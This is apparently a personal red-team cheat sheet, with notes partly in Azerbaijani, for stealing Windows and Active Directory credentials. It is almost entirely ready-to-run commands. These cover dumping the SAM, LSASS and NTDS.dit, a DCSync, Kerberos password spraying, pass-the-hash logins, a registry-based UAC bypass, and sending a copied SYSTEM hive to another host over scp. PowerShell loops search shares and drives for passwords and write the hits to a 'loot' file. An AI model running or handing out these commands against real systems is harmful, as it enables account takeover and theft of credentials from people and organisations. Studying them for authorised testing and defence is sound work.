# SAM Dump
SAM ( Security Account Manager )

C:\Windows\System32\config\SAM ( NTLM Hashes ) HKLM\SAM
C:\Windows\System32\config\SYSTEM ( Decrypted Function ) HKLM\SYSTEM
C:\Windows\System32\config\SECURITY ( Security Policy ) HKLM\SECURITY\Policy\Secrets

Shadow Copy:
1) Run as nt authority\system
psexec.exe -s -i cmd.exe
reg.exe save HKEY_LOCAL_MACHINE\SYSTEM C:\Temp\SYSTEM /y 
reg.exe save HKEY_LOCAL_MACHINE\SAM C:\Temp\SAM /y
reg.exe save HKEY_LOCAL_MACHINE\SECURITY C:\Temp\SECURITY /y

scp C:\Windows\System32\config\SYSTEM sako@192.168.0.250:/home/sako/Labaratory/ ( SSH File Sender )

pip3 install impacket
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
   User       RID            LMHASH                            NTLMHASH

netexec smb <IP> --local-auth -u <USER> -p <PASS> --lsa
netexec smb <IP> --local-auth -u <USER> -p <PASS> --sam



===================================================================================================================================================================

# LSASS Dump

LSASS Dump Technique:
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name RunAsPPL -ErrorAction SilentlyContinue
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name RunAsPPLBoot -ErrorAction SilentlyContinue

Dəyər Yoxdursa RunAsPPL = 0

Get-Process lsass | Select-Object Name,Protection

Name  Protection
----  ----------  ( LSASS Dump mümkün )
lsass

Get-WinEvent -LogName "Microsoft-Windows-Windows Defender/Operational" |
Where-Object {
    $_.Message -match "lsass|dump|credential|mimik"
} |
Select TimeCreated,Id,Message -First 10

Blocked, Credential theft, Unauthorized memory access ( LSASS Dump Defender tərəfindən bloklanır )


1) Task Manager --> Local Security Authority Process --> Create dump file ( %temp% )
CMD: tasklist /svc
PowerShell: Get-Process lsass

2) rundll32 C:\windows\system32\comsvcs.dll, MiniDump <PID> C:\lsass.dmp full

3) pypykatz lsa minidump /home/peter/Documents/lsass.dmp


===================================================================================================================================================================

# Credential Center Dump

Windows Vault:
%SystemRoot%\System32\config\systemprofile\AppData\Local\Microsoft\Vault\
%UserProfile%\AppData\Local\Microsoft\Vault\
%UserProfile%\AppData\Local\Microsoft\Credentials\
%UserProfile%\AppData\Roaming\Microsoft\Vault\
%ProgramData%\Microsoft\Vault\
%SystemRoot%\System32\config\systemprofile\AppData\Roaming\Microsoft\Vault\

1) rundll32 keymgr.dll,KRShowKeyMgr

3) cmdkey /list

Target: Domain:interactive=SRV01\mcharles
    Type: Domain Password
    User: SRV01\mcharles

3) runas /savecred /user:SRV01\mcharles cmd

4) UAC Bypass: reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f && reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /t REG_SZ /d "cmd.exe" /f && start computerdefaults.exe


===================================================================================================================================================================


# NTDS.dit

C:\Windows\NTDS\ntds.dit

1) ./username-anarchy -i <NAMES_PATH>
crackmapexec smb <IP> ( Find Domain Name )
Kerbrute: Kerberos TGT requests Event ID 4768
kerbrute userenum -d company.local --dc 10.10.10.5 users.txt
kerbrute passwordspray -d company.local --dc <IP> users.txt Winter2025!
kerbrute bruteuser -d company.local --dc <IP> passwords.txt ali.aliyev

netexec smb 10.129.201.57 -u bwilliamson -p P@55w0rd! -M ntdsutil

vssadmin create shadow /for=C:


copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\temp\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\


python3 secretsdump.py company.local/admin:Pass@10.10.10.5
python3 secretsdump.py -just-dc company.local/admin:Pass@DC-IP


DCSync (NTDS olmadan NTDS nəticəsi)

secretsdump.py -just-dc-user krbtgt company.local/admin@DC-IP
python3 secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL

Pass The Hash ( Only NTLM status open )
Chech NTLM status: netexec smb 10.10.10.5 -u test -p test 
STATUS_NOT_SUPPORTED ( Close ) 
STATUS_LOGON_FAILURE ( Open )

evil-winrm -i 10.129.201.57 -u Administrator -H 64f12cddaa88057e06a81b54e73b949b

====================================================================================================================================================================

( Credential Hunting )

start lazagne.exe all
python3 lazagne.py all

findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml

C:\Users\[USER]\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

SYSVOL
\\domain.local\SYSVOL\domain.local\

1) SYSVOL Shares
Get-ChildItem "\\domain.local\SYSVOL" -Recurse -File -ErrorAction SilentlyContinue |
Select-String -Pattern "password|passwd|pwd|creds|credential" |
Select Path, LineNumber, Line

2) SYSVOL cpassword ( AES encrypted admin password )
Get-ChildItem "\\domain.local\SYSVOL" -Recurse -File -Include *.xml |
Select-String "cpassword"

3) IT or Shared checker
$shares = "\\fileserver\IT","\\fileserver\Shared"
foreach ($share in $shares) {
    Get-ChildItem $share -Recurse -File -ErrorAction SilentlyContinue |
    Select-String -Pattern "password|passwd|pwd|token|apikey|secret" |
    Select Path, LineNumber, Line
}

4) Application secrets
Get-ChildItem "\\fileserver" -Recurse -File -Include web.config -ErrorAction SilentlyContinue |
Select-String -Pattern "password=|connectionString|user id" |
Select Path, Line

5) Auto reply files ( Maybe find Admin password )
Get-ChildItem -Path C:\ -Recurse -File -Include unattend.xml,sysprep.xml -ErrorAction SilentlyContinue |
Select-String -Pattern "password"

6) AD User Description field
Get-ADUser -Filter * -Properties Description |
Where-Object {$_.Description -match "pass|pwd|password"} |
Select Name, Description

7) AD Computer Description field
Get-ADComputer -Filter * -Properties Description |
Where-Object {$_.Description -match "pass|pwd|password"} |
Select Name, Description

8) Password Vault
Get-ChildItem C:\ -Recurse -File -Include *.kdbx -ErrorAction SilentlyContinue

9) Users Credential finder
$keywords = "*.txt","*.docx","*.xlsx","*.csv"
Get-ChildItem C:\Users -Recurse -File -Include $keywords -ErrorAction SilentlyContinue |
Where-Object {$_.Name -match "pass|password|credential|login"} |
Select FullName

10)Get-ChildItem "\\fileserver\Share" -Recurse -File -ErrorAction SilentlyContinue |
Where-Object {$_.Name -match "pass|password"} |
Select FullName

11) Full Credential Harvesting
$patterns = "password","passwd","pwd","credential","token","apikey","secret"
Get-ChildItem -Path C:\ -Recurse -File -ErrorAction SilentlyContinue |
Select-String -Pattern $patterns |
Select Path, LineNumber, Line |
Out-File C:\loot\password_hits.txt








